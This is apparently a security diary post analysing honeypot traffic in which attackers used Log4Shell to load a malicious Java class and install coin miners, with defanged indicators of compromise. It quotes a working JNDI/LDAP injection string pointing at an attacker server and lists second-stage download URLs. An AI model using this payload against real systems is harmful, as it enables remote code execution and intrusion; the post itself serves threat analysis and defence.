
Log4Shell exploited to implant coin miners

Published: 2021-12-13
Last Updated: 2021-12-13 01:31:37 UTC
by Renato Marinho (Version: 1)
1 comment(s)

Analyzing the requests hitting the ISC honeypots, I found out that coin miner operators have just added Log4Shell to their arsenal.

The request that hit our honeypot tries to make a vulnerable log4j resolve the lookup '${jndi:ldap://45[.]83.193.150:1389/Exploit}'. Following the LDAP reference makes log4j load and instantiate a malicious class hosted at 'http://31[.]220.58.29/Exploit.class'.

I could find the payload address by performing the JNDI lookup just like log4j does, then reading the class name and codebase address from the returned Reference object. To do so, I created a simple tool that is available on GitHub.

After decompiling the malicious class using fernflower, I could see the following code.

Depending on the targeted operating system, the class downloads and executes a second-stage payload hosted at a different location.

In the case of a Windows OS, it fetches http://172[.]105.241.146:80/wp-content/themes/twentysixteen/s.cmd, a PowerShell script that downloads and executes a coin miner, as seen below.

For non-Windows operating systems, the malicious class downloads and executes an ELF binary hosted at http://18[.]228.7.109/.log/log. Although I suspect it is also a coin miner, the ELF file is yet to be analyzed.

Bojan and Johannes wrote about Log4Shell here and here, respectively. 

IOCs

Network

ldap://45[.]83.193.150
http://31[.]220.58.29
http://172[.]105.241.146
http://18[.]228.7.109


Files (MD5 and SHA256 hashes)


--
Renato Marinho
Morphus Labs | LinkedIn | Twitter


